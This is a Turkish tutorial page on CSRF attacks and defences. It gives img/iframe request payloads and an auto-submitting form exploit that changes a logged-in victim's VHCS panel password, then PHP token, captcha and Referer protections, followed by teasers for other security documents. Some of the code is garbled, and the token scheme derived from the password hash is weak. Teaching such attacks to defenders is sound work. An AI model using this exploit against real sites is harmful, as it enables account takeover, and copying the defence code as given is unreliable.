CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Nasıl Kullanılır? ve Nasıl Korunulur?
|
|
- Pembe Akpınar
- 8 yıl önce
- İzleme sayısı:
Transkript
1 CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Nasıl Kullanılır? ve Nasıl Korunulur? CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Başlamadan Önce Size Kısaca bir Csrf(Xsrf) yani Cross Site Request Forgery Nedir ondan bahsetmek istiyorum. Cross Site Request Forgery (diğer adlarıyla XSRF, CSRF, ve Cross Site Reference Forgery) browserlerın javascript çalıştırma desteğiyle kişilere istenilenin dışında servera komut yollanmasını sağlayan kodlardır. Sitemiz veya sistemimiz bu komutlar için genel olarak url lerden yararlanır. (Örn: verify_pass=s1b3rk4n&submited=1) bizde bunu bildiğimiz için bundan yararlanıcaz veya formlar oluşturarak işlemimizi gerçekleştireceğiz. Zaten amacımızda bu işlemleri gerçekleştirebilecek yetkiye sahip kişileri oturum açmış durumdayken kullanarak onlar yerine kendi kodlarımızı güvenilir kodlarmış gibi kullanıcıyı kullanarak göndermektir. Ve bu saldırıları html veya javascript kodları kullanarak işlemesini sağlayabiliriz.(örn:<img src= verify_pass=s1b3rk4n&submited=1 >) Saldırı Şekilleri 1: Saldırganımız önceden saldırı için hazırladığı sitemizi kurbana yollar kurban gezerken kurbanın domain sitesinde işlem yapması için ya bir teşvikte bulunabilir saldırganımız, online olduğu bir zamanı seçebilir ya da kurbanın işi çıkıp girebilir girdiği anda online olduğu için yani çevirim içi sitenin kod kısmına yerleştirilmiş olan (Örn: <img src= y_pass=s1b3rk4n&submited=1 >, <iframe src= y_pass=s1b3rk4n&submited=1 >) gibi html kodları veya formlarla (javascript ile) saldırganımız kendi adına kişinin servera kodları yollamasını sağlar Sonra olacak olan Şifrenin Değişmesidir. Bundan sonra saldırgan bunu ister başka bir java veya php codeyle işlemin gerçekleştiğini ya bir mail ile ya bir sniffer ile veya bilgisayarına bir log gönderterek öğrenmesi çok basit
2 Ve kullanıcımızın tüm domainleri gidiyor. Neden? Çünkü kendisi için gerekli önlemleri almamış en basiti no-addon eklentisiyle mozilla nın o javascript kodunun çalışmasını engelleyebilirdi html kodlarına da bilinmeyen bağlantıları engelleyerek önlem alabilirdi Saldırı Şekilleri 2: Bu saldırı şeklimizde de yukarıda bahsettiğimiz formlarla saldırı şeklini kısaca gösterim Örneğin vhcs panelimizde bulunan bir csrf ile saldırganın neler yapabileceğini gösterim. Exploit Code : <script type="text/javascript"> function siberkan(){ document.forms[0].submit(); </script> </HEAD> <body onload="siberkan()"> <siberkan><html><body> <form name="client_change_pass_frm" method="post" action=" <input type="password" name="pass" class="textinput" value="passherre"> <input type="password" name="pass_rep" class="textinput" value="passhere"> <input type="hidden" name="uaction" value="updt_pass"> <input type="hidden" name="submit" value="update password"> </html></body></siberkan> Exploit kodumuz yukarda göründüğü gibidir burada javascript kodu yardımıyla saldırgan tarafından kullanıcıya.html şeklinde gönderilerek online yani aktif halde bulunan kullanıcının server a şifre değiştirme isteğinde bulunmasını sağlayabiliriz. Bunun sonucunda panel şifresi
3 değişti. Yine kurban elindekini kaybetti Kendinizde bu saldırı şekillerini çoğaltabilirsiniz ben en çok kullanılan 2 yöntemi gösterdim Xss ve Xsrf Arasındaki İlişki: Xss ve xsrf birbirini çok iyi tamamlayabilir bunu şöyle izah ettiğimde sanırım herkes anlayabilir örn: bir sitenin şifre değişme üzerine yazılmış bir xsrf açığı varsa ve kullanıcı adı da gerekiyorsa bununda aynı sayfaya yerleştirilmiş xss koduyla kolaylıkla alabiliriz yani bu 2 saldırı yöntemi aslında birbirine çok yardımcı yöntemlerdir Xsrf Den Korunma Yöntemleri: 3 ve daha fazla yöntemi vardır şimdi bunları açıklıcam. 1.Csrf $_POST Token Koruması Bunu sizlere adım adım anlatmam daha mantıklı ve de açıklayıcı geldiği için böyle anlatcam 1. Adım: Bu kodu tüm <form method="post"> kodlarından sonra echo() içerisinde eklemeniz önemlidir: Code: <input type="hidden" name="token" value="".$_session['token']."" /> 2. Adım: Bu kodu config dosyanıza ekleyin Code: if (isset($_user['id'])) { // your function to check if a user is logged in if (empty($_session['token'])!isset($_session['token'])) { // if there is no token set $_SESSION['token'] = strrev(md5($_user['password'])); //set a token with a reverse string and md5 encryption of the user's password if (CSRF_PROTECTED!= false) { // if you did not define CSRF_PROTECTED as false if ($_POST) { // if there is a form present if ($_POST['token']!= $_SESSION['token']) { // if the input token does not equal the session token header("location: /index.php"); // redirect to index die(); // stops all $_POST data from being sent 3. Adım: Bu kodu da tüm include ile config dosyalarını çeken php dosyalarına ekleyiniz Code: define("csrf_protected", false);
4 2.Csrf Captcha Koruması: Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) kısaca kişinin üye olurken veya bir işlemi yaparken karşısına çıkna değişken sayı ve rakamlardan oluşan resimlerdir. Bu resimleri bir form da gerekli yere yazmadığımız sürece o işlem tamamlanmayacağı için csrf saldırıları için bir koruma teşkil etmektedir. Ama bundan öncede eğerki bu kurulumu zaten gerçekleştirmek istiyorsanız etkili kullanımı olan bir captcha kullanmanızı öneririm çünkü bazı sistemler captcha koyduğu halde aynı kodlar gösterilip duruyor veya bu kodlar okunabiliyor bu hataya düştükten sonra hiçbir anlamı olmaz captcha yı kullanmanın 3.Browser Güvenliği: Bunla da çok güvenilir de olmasa da kendimizce bir güvenlik oluşturabiliriz Örn: javascript kodları ile yapılan saldırılara karşı javascript kodlarının çalışmasını önleyerek ve ya html kodlarıyla yapılan saldırılara karşı yönlenecek siteleri engelleyerek ve ya kendi belirlediğimiz kodların filtre ile süzmesini sağlayarak engellenebilir 4. HTTP_REFERER ile Engelleme: Yani sizin istemediğiniz url den gelen istekleri reddederek bu kodları yollayan kişiyi farklı bir sayfaya yönlendirme işlemi ile csrf yöntemlerini engelleme tekniğidir.. Bunu aşağıdaki kodlarla sağlayabiliriz Örneğin: <?php if (strstr($_server['http_referer']," ")) { header ("Location: else { header ("Location: Burada google.com dan gelmeyen bir isteği turk-hacking.org a yönlendirecek ama google.com dan gelen istege seymen.org u açacaktır bu kadar basit 5.URL Rewrite: URL Rewrite tekniği kısaca açıklamak gerekirse, sitemizdeki Url leri?id=30 şeklinden daha anlamlı olan baslik.html şekline çevirme işlemidir. Bunu yapmak uzun ve uğraşlı olabileceğinden ve tam sonuç alınamayacağından pek tavsiye edemem 6.Get yerine Post kullanımı: Get yerine Post kullanılması yukarıdaki birinci saldırıyı etkisiz kılmaya yarayabilir yani post kullanımında <img src= > ile resim paylaşımına izin verilebilir buda yukarıdaki saldırının resim olarak gözükmesine ve de x yani yanlış url olduğunu belli etmesini sağlar fakat saldırgan bunu javascript kodlarıyla atlatabileceği için tavsiye edemem 7. <input type= hidden > ile Korunma:
5 Bu kodumuzla sitemizin kaynak kısmına yerleştirebileceğimiz çeşitli değişken değerler (Örn:md5, herhangi başka değerler) bu yöntemin etkisiz kalmasını sağlayabilir bu en çok tavsiye edebileceğim yöntemlerdendir Örnek Csrf Açıkları: [By S1B3RK4N] S1B3RK4N
0x01 : Zafiyetin İncelenmesi
CSRF Mesut Timur, , webguvenligi.org, 19/02/2009 CSRF, Cross-Site Request Forgery, web uygulamalarındaki çeşitli fonksiyonalitelerin mağdur kullanıcının bilgisi dahilinde olmadan
DetaylıSelective Framebusting
Selective Framebusting Seçiçi Çerçeveleme Engelleme Sema Arık, TurkcellTeknoloji, sema.arik@turkcellteknoloji.com.tr Bedirhan Urgun, Web Güvenlik Topluluğu, urgunb@hotmail.com Giriş PCI DSS Requirements
DetaylıPHP ile İnternet Programlama
PHP ile İnternet Programlama Doç.Dr. Gazi Üniversitesi Gazi Eğitim Fakültesi Bilgisayar ve Öğretim Teknolojileri Eğitimi Bölümü 5. BÖLÜM: Oturum Yönetimi ve Güvenlik Sayfaya Yönlendirme PHP sayfamızdan
DetaylıWeb 2.0 Güvenliği @2014 Örnek Eğitim Notu bilgi@bga.com.tr
Web 2.0 Güvenliği @2014 Örnek Eğitim Notu bilgi@bga.com.tr Javascript 1995 Netscape, Brendan Eich tarafından geliştirildi. Dinamik olmasının yanında en önemli iki özelliği; Lambda Closure Javascript -
DetaylıXSS Exploitation via CHEF
XSS Exploitation via CHEF Evren Yalçın SignalSec Corp. www.signalsec.com GİRİŞ Xss zafiyetlerini exploit ederken genelde Beef(The Browser Exploitation Framework) aracı kullanılmaktadır. Fakat ek araçlar
DetaylıMOBILEPAX SOAP PRODUCT API KULLANIM ŞEKLİ
MOBILEPAX SOAP PRODUCT API KULLANIM ŞEKLİ Versiyon: 1.0.4 URL http://merchant.mobilepax.com/services/product.asmx Metot MobilePaxProduct fonksiyonu buton bilgisi oluşturulacak ürünün bilgilerinin Mobilepax
DetaylıMOBILEPAX XML PRODUCT API KULLANIM ŞEKLİ
MOBILEPAX XML PRODUCT API KULLANIM ŞEKLİ Versiyon: 1.0.4 URL Adresi http://merchant.mobilepax.com/services/product.aspx Gönderilen XML Yapısı MobilePaxProduct fonksiyonu buton bilgisi oluşturulacak ürünün
DetaylıWeb Uygulama Pentest Eğitimi
Web Uygulama Pentest Eğitimi Konu: Girdi Denetimi @2014 Örnek Eğitim Notu bilgi@bga.com.tr Girdi Denetimi Uygulama kullanmadan önce bütün güvensiz verilerin doğru bir şekilde denetlenmesidir. Bir çok saldırı
DetaylıGüvenlik Java ve Web Uygulama Güvenliği
Güvenlik Java ve Web Uygulama Güvenliği Melih Sakarya www.melihsakarya.com melih.sakarya@gmail.com www.mergecons.com Olası Açıklar Donanımsal açıklar Sistemsel Açıklar Yazılımsal Açıklar Sosyal Mühendislik
DetaylıVERİ GÜVENLİĞİ. Web Uygulamaları Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü
VERİ GÜVENLİĞİ Web Uygulamaları Güvenliği Özer Çelik Matematik-Bilgisayar Bölümü Http nedir? HTTP (İngilizce Hypertext Transfer Protocol, Türkçe Hiper Metin Transfer Protokolü) bir kaynaktan dağıtılan
DetaylıSol tarafta yer alan Click here to activate your account linkini seçiniz.
Öğrenci Bilgi Sistemi (OASIS) Kayıt İşlemleri OASIS kayıt işlemlerini gerçekleştirebilmek için; öncelikle kayıt işlemleri esnasında Öğrenci İşleri tarafından verilen öğrenci numarası ve e-posta adresinin
DetaylıWeb Formlar ve Sayfalar Arasında Bilgi Gönderme. BATML İnternet Programcılığı 1
Web Formlar ve Sayfalar Arasında Bilgi Gönderme BATML İnternet Programcılığı 1 Bazı web sitelerinde sayfalar arasında bilgi veya değişken göndermek gerekebilir. Gönderilen bu bilgi kullanıcı adı ve şifre
DetaylıÜlkemizdeki Üniversite Web Sayfalarının Siber Güvenlik Açısından Hızlı Bir Değerlendirmesi
Ülkemizdeki Üniversite Web Sayfalarının Siber Güvenlik Açısından Hızlı Bir Değerlendirmesi Kadriye HUYSAL ÖZGÖÇMEN kkhuysal[at]gmail.com Baran ÇELİK baran.celik[at]gmail.com Halil Özgür BAKTIR ozgur.baktir[at]gmail.com
DetaylıOturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Gökhan
Oturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Gökhan Muharremoğlu Oturum Öncesi Tanımlı Oturum Kimliği Çerezi Açığı Oturum öncesi tanımlı oturum kimliği çerezi açığı, az bilinen ve dünya genelinde
DetaylıWEB UYGULAMA GÜVENLİĞİ HAKKINDA. Mesut Güngör İzmir Yüksek Teknoloji Enstitüsü Bilgi İşlem Daire Başkanlığı
WEB UYGULAMA GÜVENLİĞİ HAKKINDA Mesut Güngör İzmir Yüksek Teknoloji Enstitüsü Bilgi İşlem Daire Başkanlığı İçindekiler Bilinen en popüler web uygulama atakları Güvenli yazılım geliştirme Prosedürler Bilinen
DetaylıW3af ile Web Uygulama Güvenlik Testleri
W3af ile Web Uygulama Güvenlik Testleri Birkaç tıkla web sayfalarının, veritabanlarının hacklenebildiği, bir komutla kablosuz ağ şifrelerin kırıldığı günleri yaşıyoruz. Çok değil birkaç yıl öncesi sadece
DetaylıİNTERNET PROGRAMCILIĞI - II
0 İÇİNDEKİLER Bölüm 1 PHP İle Web Programlamaya Giriş 1 Bölüm 2 PHP Kodlama Standartları 5 Bölüm 3 PHP Değişken Kullanımı 17 Bölüm 4 IF Yapısı 32 Bölüm 5 Döngüler ve Diziler 64 1 BÖLÜM 1 PHP İLE WEB PROGRAMLAMAYA
DetaylıCODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0
CODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0 Özgür Web Teknolojileri Günleri 2010 Yeditepe Üniversitesi, Airties Salonu 16 Ekim 2010 (14:00 14:45) Fatih BAZMAN (http://codeigniter.gen.tr)
DetaylıInternet Programming II. Elbistan Meslek Yüksek Okulu Bahar Yarıyılı
Internet Programming II Elbistan Meslek Yüksek Okulu 2015 2016 Bahar Yarıyılı Öğr. Gör. Murat KEÇECĠOĞLU 23 May. 2016 Form Form İşlemleri Tarayıcıdan bilgi alarak işlem gerçekleştirme FORM elemanları yardımıyla
DetaylıTanımı 46 2-4-6 Problemi 46 Şüpheci Yaklaşım 47 Tamsayı Taşması (Integer Overflow) 47 Tamsayı Taşması Java Uygulaması 48
1 Yazılım Güvenliği 2 Yazılım Güvenliği Olgunluk Modelleri 4 OpenSAMM 6 Tehdit Modelleme 7 Güvenli Kod Denetimi 8 Statik Kod Analizi 9 Sızma Testleri-Pentest 10 13 Ne Kadar Karmaşık Olabilir ki? 14 HTML
Detaylıwww.elektrikogretmenleri.com
DREAMWEAVER DA TABLOLAR KULLANARAK İNDEX SAYFASI HAZIRLAMAK Günümüzde web siteleri Frameset yapısı ve Tablo yapısı kullanarak yapılmaktadır. Frameset (Çerçeve) yapılı web sitelerinde index sayfaları oluşturulduğunda
DetaylıWolvox Web Entegrasyon. AKINSOFT Wolvox Web Entegrasyon Yardım Dosyası
AKINSOFT Yardım Dosyası Doküman Versiyon : 07.05.01 Tarih : 11.05.2016 1. ÇALIŞMA SİSTEMİ HAKKINDA BİLGİ AKINSOFT WOLVOX Web Entegrasyonu programı WOLVOX ERP programından stok XML gönderimi, AKINSOFT E-Ticaret
DetaylıSQLMap ile CSRF Bypass İbrahim BALİÇ ibrahim@balicbilisim.com
SQLMap ile CSRF Bypass İbrahim BALİÇ ibrahim@balicbilisim.com Merhabalar, Birçok güvenlik araştırmacısı web uygulamaları için penetrasyon testleri yaparken, tespit ettikleri zafiyetleri exploit edebilmek
DetaylıBasit bir web uygulaması
AJAX Ahmet Demirelli ahmetdemirelli@sabanciuniv.edu SCJP 5.0, SCWCD 1.4 Sabancı Üniversitesi Bilişim Teknolojileri Yüksek Lisans Programı 3/20/2007 Sabanci University 1 Ajanda Neden AJAX ihtiyacı AJAX
Detaylı1. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II. Öğr.Gör. Hakan YILMAZ. hakanyilmaz@karabuk.edu.tr
1. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II Öğr.Gör. Hakan YILMAZ hakanyilmaz@karabuk.edu.tr Karabük Üniversitesi Uzaktan Eğitim Uygulama ve AraştırmaMerkezi 2 İçindekiler 1. GİRİŞ... 3 1.1 ASP NEDİR?...
DetaylıERİŞİM ENGELLEME DOS VE DDOS:
DoS nedir? ERİŞİM ENGELLEME DOS VE DDOS: Denial of service türkçesi erişim engelleme saldırısı olarak anlaşılmaktadır. Hedef bilgisayar ağının kaynaklarını kullanamayacak şekilde erişilmez kılınmasını
Detaylı8. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II. Öğr.Gör. Hakan YILMAZ. hakanyilmaz@karabuk.edu.tr
8. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II Öğr.Gör. Hakan YILMAZ hakanyilmaz@karabuk.edu.tr Karabük Üniversitesi Uzaktan Eğitim Uygulama ve Araştırma Merkezi 2 İçindekiler QUERYSTRING KOLEKSIYONU... 3 FORM
DetaylıPHP I PHP I. E. Fatih Yetkin. 26 Eylül 2011
PHP I E. Fatih Yetkin 26 Eylül 2011 Outline Temel Tanımlar HTML e Giriş PHP ye Giriş MySQL ve PHP Temel Tanımlar Web Sunucu Nedir? Teknik detaylar bir kenara bırakılacak olursa, hazırlanan web sayfasını
DetaylıOluşturmak istediğimiz OU ye bir isim veriyoruz. Name kısmına ISTANBUL yazıyoruz,
ORGANİZATİONAL UNİT (OU) OrganizationUnit(OU): Türkçe Yapısal Birim olarak adlandırılan ve merkezi yönetimimizi kolaylaştıran bir objedir. Organizational Unit domain içerisindeki kullanıcı, group ve bilgisayarları
Detaylıhttp://alikoker.name.tr
MySQL PHP web geliştiricileri genel olarak database tercihlerini çok rahat sql komutları yardımıyla kontrol edilebilen MySQL den yana kullanılar. Özellikle PHP+MySQL+Apache üçlüsü performans olarak web
DetaylıWEB PROGRAMLAMA. PHP Temelleri 2. Dr. Erman Yukselturk
WEB PROGRAMLAMA PHP Temelleri 2 Dr. Erman Yukselturk Superglobal Değişkenler 1/4 Php de önceden tanımlanmış ve script in herhangi bir yerinden çağrılabilen ve çalıştirılabilen çevreye özel bilgiler sunan
DetaylıDoktor Web Tasarım ile sıfır hatada Dünya standartlarında web kalite politikasına uygun web sitesi oluşturabileceksiniz
KULLANIM KILAVUZU Doktor Web Tasarım ile sıfır hatada Dünya standartlarında web kalite politikasına uygun web sitesi oluşturabileceksiniz Her doktorun ihtiyacı olan doktor web sitesi, hasta ve doktor arasındaki
DetaylıÖğr. Gör. Serkan AKSU http://www.serkanaksu.net. http://www.serkanaksu.net/ 1
Öğr. Gör. Serkan AKSU http://www.serkanaksu.net http://www.serkanaksu.net/ 1 JavaScript JavaScript Nedir? Nestcape firması tarafından C dilinden esinlenerek yazılmış, Netscape Navigator 2.0 ile birlikte
DetaylıWWW.OZTEKHABERLESME.COM
ÖZTEK HABERLEŞME APİ DÖKÜMANI WWW.OZTEKHABERLESME.COM VER:6.1.0 ~ 1 ~ İÇİNDEKİLER BİLMENİZ GEREKENLER... 3 HTTP POST (XML) YÖNTEMİ... 4 TANIMLAR... 4 ÖRNEK XML YAPISI... 4 PHP ÖRNEK KOD... 5 Örnek Sayfayı
Detaylı8- Sistem tarihinden gün değerini alarak çift veya tek sayı olup. 9-1 - 10 arasındaki sayılardan tek olanları yeşil çift olanları kırmızı
JAVASCRİPT SORULARI 1- Javascript For Döngüsü ile 1 den 100 e kadar olan sayıların toplamını bulan programı yazın? 2-1 den 1000 e kadar olan sayılardan 10 a ve 9 a tam bölünenlerin toplamını bulan programı
Detaylıİnternet Programcılığı Form İşlemleri ve Oturum Yönetimi Örnekleri
1 İnternet Programcılığı Form İşlemleri ve Oturum Yönetimi Örnekleri Örnek 1 : Aşağıda ekran görüntüleri verilen HTML formunu ve oluşturduğunuz bu formdaki bilgileri elde edecek PHP sayfasını hazırlayınız.(formdan
DetaylıÖzgür Yazılımlar ile Statik ve Dinamik Kod Güvenliği Analizi Emre Evren Yalçın
Özgür Yazılımlar ile Statik ve Dinamik Kod Güvenliği Analizi Emre Evren Yalçın $Whoami Web Developer @ İstanbul Kültür Üniversitesi BST Information Security Researcher @ Signalsec.com Ajanda Statik kod
DetaylıWEB TASARIMININ TEMELLERİ
WEB TASARIMININ TEMELLERİ Öğr. Gör. M. Mutlu YAPICI Ankara Üniversitesi Elmadağ Meslek Yüksekokulu Ders İzlencesi Hafta Modüller/İçerik/Konular 1. Hafta İnternet ve WEB Tanımları Html Temel Etiketleri
DetaylıRetargeting. MediaMind Turkey
Retargeting MediaMind Turkey Retargeting Retargeting Reklamverenlerin, belirlenen hedef kitleye yayın yapması için kullanılır. Retargeting İşleyişi 1. Kullanıcı, retargeting kodu bulunan sayfaya gider.
DetaylıScript. Statik Sayfa. Dinamik Sayfa. Dinamik Web Sitelerinin Avantajları. İçerik Yönetim Sistemi. PHP Nedir? Avantajları.
Script Statik Sayfa Dinamik Sayfa Dinamik Web Sitelerinin Avantajları İçerik Yönetim Sistemi PHP Nedir? Avantajları Dezavantajları Script HTML kodları arasına yerleştirilen küçük kodlardır. Web sayfalarında
DetaylıArayüz Geliştirme Dokümantasyonu
Arayüz Geliştirme Dokümantasyonu Proje: İş: Müşteri: Nosab Web Sitesi Arayüz Geliştirme Aeronorm Index 1. Sayfalar 2. Renk Paleti 3. Tipografi 4. Kutu Modeli 5. Bileşenler 6. Kod ve Sayfa Yapısı 7. Responsive
DetaylıCambridge LMS e Başlama- Öğrenciler
Cambridge LMS e Başlama- Öğrenciler 1. Başlamadan önce LMS i kullanmaya başlamadan önce bilgisayarınızın minimum sistem gereklerine sahip olup olmadığını ve internet bağlantınızın kabul edilebilir bir
DetaylıWeb Uygulama Güvenliği Kontrol Listesi 2010
Web Uygulama Güvenliği Kontrol Listesi 2010 1 www.webguvenligi.org Web uygulama güvenliği kontrol listesi 2010, OWASP-Türkiye ve Web Güvenliği Topluluğu tarafından güvenli web uygulamalarında aktif olması
DetaylıKURULUM KILAVUZU MART 2014. Visilabs Target Kurulum Kılavuzu
KURULUM KILAVUZU MART 2014 1 İçindekiler 1 Suggest Methodu... 3 1.1 Banner Sıralamasının Ziyaretçilere özel değişmesi... 3 1.2 Site üzerindeki widget aracığıyla gösterilen öneriler... 4 1.2.1 RealTime
Detaylıduralbend.com Web Sayfasının Seo Analiz Raporu
duralbend.com Web Sayfasının Seo Analiz Raporu Seo Rapor Tarihi 19 Şubat 2019 Saat: 13:51 PM Seo Puanı 58/100 Temel SEO İçeriği Site Başlığı (Title) DuralBend Tube Processing Machines Karakter Sayısı :
DetaylıWEB TASARIM I. Öğr. Gör. M. Mutlu YAPICI. Ankara Üniversitesi Elmadağ Meslek Yüksekokulu
WEB TASARIM I Öğr. Gör. M. Mutlu YAPICI Ankara Üniversitesi Elmadağ Meslek Yüksekokulu Ders İzlencesi Hafta Modüller/İçerik/Konular 1. Hafta PHP Tanımı ve Sunucu Kurulumları 2. Hafta PHP Yazım Notasyonu
DetaylıBİLGİSAYAR VE AĞ GÜVENLİĞİ ÖĞR. GÖR. MUSTAFA ÇETİNKAYA DERS 2 > AĞ VE UYGULAMA GÜVENLİĞİ
BİLGİSAYAR VE AĞ GÜVENLİĞİ BUG RESEARCHER. BUG-BÖCEK SİSTEM ZAYIFLIKLARI RESEARCHER-ARAŞTIRMACI SİSTEM ZAYIFLIKLARINI BULMA WEB UYGULAMALARINDA HATA ARAR SAYFA > 1 BUG RESEARCHER. İYİ NİYETLİ SİSTEM AÇIKLARININ
DetaylıBölüm 24. Java Ağ Uygulamaları 24.1 Java Appletleri. Bir Applet in Yaşam Döngüsü:
Bölüm 24 Java Ağ Uygulamaları 24.1 Java Appletleri Applet, Web tarayıcısında çalışan bir Java programıdır. Bir applet, Java uygulaması için tamamen fonskiyonel olabilir çünkü bütün Java API ye sahiptir.
DetaylıCambridge LMS e Başlama- Öğrenciler
Cambridge LMS e Başlama- Öğrenciler 1. Başlamadan önce LMS i kullanamaya başlamadan önce bilgisayarınızın minimum sistem gereklerine sahip olup olmadığını ve internet bağlantınızın kabul edilebilir bir
DetaylıAKINSOFT FilterPlus 2
AKINSOFT FilterPlus 2 Yardım Dosyası Doküman Versiyon : 1.01.02 Tarih : 17.12.2010 Sayfa-1 1- ÇALIŞMA ŞEKLİ HAKKINDA KISA BİLGİ FilterPlus 2 programı, çocukların internete girişlerini daha güvenli yapmak
DetaylıInternet Programming II. Elbistan Meslek Yüksek Okulu 2014 2015 Bahar Yarıyılı
Internet Programming II Elbistan Meslek Yüksek Okulu 2014 2015 Bahar Yarıyılı Öğr. Gör. Murat KEÇECĠOĞLU 11-14 May. 2014 Form Form İşlemleri Tarayıcıdan bilgi alarak işlem gerçekleştirme FORM elemanları
DetaylıMASTER PAGE SAYFASI KULLANIMI
MASTER PAGE SAYFASI KULLANIMI Hazırladığımız Web sayfalarında sayfanın belli bölgelerinin sürekli sabit kalmasını istiyorsak ve bazı kısımlarının değişmesini istiyorsak Master Page Sayfası kullanırız.
DetaylıWEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir?
WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir? Gereksiz yedek dosyaları Default ayarlarla gelen konfigürasyon dosyaları Yetkisi tam olarak verilmiş dosyalar ya da dosya izni kontrolü yapılmadan sunucuda
DetaylıTwitter da bu durumla karşılaşan başka kullanıcılar var mı diye twitter virüs anahtar kelimeleri ile genel bir arama yaptığımda ise bu durumun Nisan
Sosyal Ağ Hırsızları Bundan üç yıl önce yine Haziran ayında yayımlamış olduğum Jeton Hırsızları başlıklı blog yazımda, art niyetli kişilerin zararlı Chrome ve Firefox eklentiler ile kullanıcıların Facebook
DetaylıCambridge LMS e başlama- Öğrenciler
Cambridge LMS e başlama- Öğrenciler 1. Başlamadan önce LMS i kullanamaya başlamadan önce bilgisayarınızın minimum sistem gereklerine sahip olup olmadığını ve İnternet bağlantınızın kabul edilebilir bir
Detaylı9. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II. Öğr.Gör. Hakan YILMAZ. hakanyilmaz@karabuk.edu.tr
9. HAFTA KBT204 İNTERNET PROGRAMCILIĞI II Öğr.Gör. Hakan YILMAZ hakanyilmaz@karabuk.edu.tr Karabük Üniversitesi Uzaktan Eğitim Uygulama ve Araştırma Merkezi 2 İçindekiler Request Nesnesinin Özellikleri
DetaylıHTML Sayfaları. Bütün html sayfaları
HTML VİZE NOTLARI HTML Sayfaları Bütün html sayfaları tagıyla başlar ve tagıyla biter. tagları arasında ve tagları vardır. Örnek bir html boş sayfası kodları şu şekilde
DetaylıWeb Tasarımı - Yrd. Doç. Devkan Kaleci 1
. onclick 2. onmouseover ve OnMouseOut 3. onload ve onunload 4. onsubmit 5. onreset 6. onfocus ve onblur 7. onchange 8. onabort, onerror 2 Bir olayın oluşması, mevcut durumda bir değişiklik olması anlamına
DetaylıBölüm 10: PHP ile Veritabanı Uygulamaları
Bölüm 10: PHP ile Veritabanı Uygulamaları -231- Öğr.Gör. Serkan DİŞLİTAŞ 10.1. PHP PHP, platformdan bağımsız sunucu taraflı çalışan betik bir web programlama dilidir. PHP programlama dili ile MySQL, MSSQL,
DetaylıASP.NET 1. DURUM YÖNETİMİ. BLM 318 e-ticaret ve Uyg. Durum Yönetimi Nedir? Durum Yönetimi: Karșılaștırma İÇERİK. Sunucu-taraflı Durum Yönetimi
Nedir? olmadan Login.aspx Bilgilerinizi giriniz Durum Yönetimi İle Login.aspx Bilgilerinizi giriniz Adınız Adınız Pınar Pınar Soyadınız Soyadınız Onay Durdu Onay Durdu Gönder Gönder ASP.NET - 1 sayfa.aspx
DetaylıKULLANIM KILAVUZU. VSP Teknoloji ile sıfır hatada Dünya standartlarında web kalite politikasına uygun web sitesi oluşturabileceksiniz
KULLANIM KILAVUZU VSP Teknoloji ile sıfır hatada Dünya standartlarında web kalite politikasına uygun web sitesi oluşturabileceksiniz Kullanıcı dostu kontrol panelli dünya standartlarında web tasarım uygulaması.
DetaylıWeb Programlama Kursu
Web Programlama Kursu Bu kurs ne değildir? Neyi amaç edinmiştir? Bilgisayar Programcısı? Web Tasarımcısı? Web Programcısı? Neler öğreneceğiz? Kurs sonunda neler yapılabileceğiz? Örnek siteler Örnek Projeler
DetaylıYerel Ağlarda Port 139 ve Saldırı Yöntemi
Yerel Ağlarda Port 139 ve Saldırı Yöntemi Merhaba arkadaşlar. Gerek kitap hazırlığında olmam, gerekse de işlerimin oldukça yoğun olmasından dolayı, bir süredir makale yayınlayamadım. Bu süre boşluğunu
DetaylıAPI geliştiricileri. Web server ile yapılan entegrasyonun neticeleri. API Dokumantasyonu
API geliştiricileri Open API serverınızın tüm kontrolünü, groupware erişim izini, kullanıcı ve domain yonetimi, server ayarları, tasarlanma, istatistikler ve daha fazlasına bu script programı ile erişebilirsiniz.
DetaylıWeb Uygulama Güvenliğinde Doğru Bilinen Yanlışlar!
Web Uygulama Güvenliğinde Doğru Bilinen Yanlışlar! Deniz Çevik Güvenlik Testleri Yöneticisi deniz.cevik@biznet.com.tr Gündem Kısaca Biznet Web Uygulama Mimarisine Kısa Bir Bakış Uygulama Güvenliği Sağlamada
DetaylıKurulum 14 FTP ye Bağlanmak ve Dosyaları Atmak 14 Veritabanı Oluşturulması ve Bağlanıp Kurulumun Tamamlanması 15
vii 1 İçerik Yönetim Sistemi Nedir? 2 WordPress Nedir? 2 WordPress Kısa Tarihi 3 WordPress Gücünü Nereden Alıyor? 3 WordPress ile Neler Yapabiliriz? 4 Kişisel Blog 4 Kurumsal Blog 4 Kurumsal Site 4 Tanıtım
DetaylıArmitage Nedir? Kullanım Öncesi
Armitage Nedir? Armitage, metasploit veritabanını kullanan grafiksel bir test / saldırı araçlarından bir tanesidir. Armitage metasploit veritabanlarını kullanması nedeniyle hedef sistemin bilgilerine göre
DetaylıSmoothwall URL Filter Kurulumu
Smoothwall URL Filter Kurulumu Dosya, Kelime, Site, Url, İp bazlı erişim ve yasaklama işlemleri Merhaba bu yazımızda Smoothwall da URL Filter servisini ekleme ve özelliklerinden bahsedeceğiz. URL Filter
DetaylıSESSİON KULLANIMI. .Aşağıdaki Kodları da SessionDevam.asp adıyla kaydedelim. Language=VBScript Codepage="1254"%>
SESSİON KULLANIMI Bir ASP sayfasında herhangi bir değişkeni fonksiyon dışında tanımlamakla ve değer atamakla onu bütün fonksiyonlar için geçerli hale getirebiliriz. Fakat kimi zaman isteriz ki, bir fonksiyonun
Detaylı(W)eb (A)pplication (F)irewall Bypass http://www.bga.com.tr bilgi@bga.com.tr
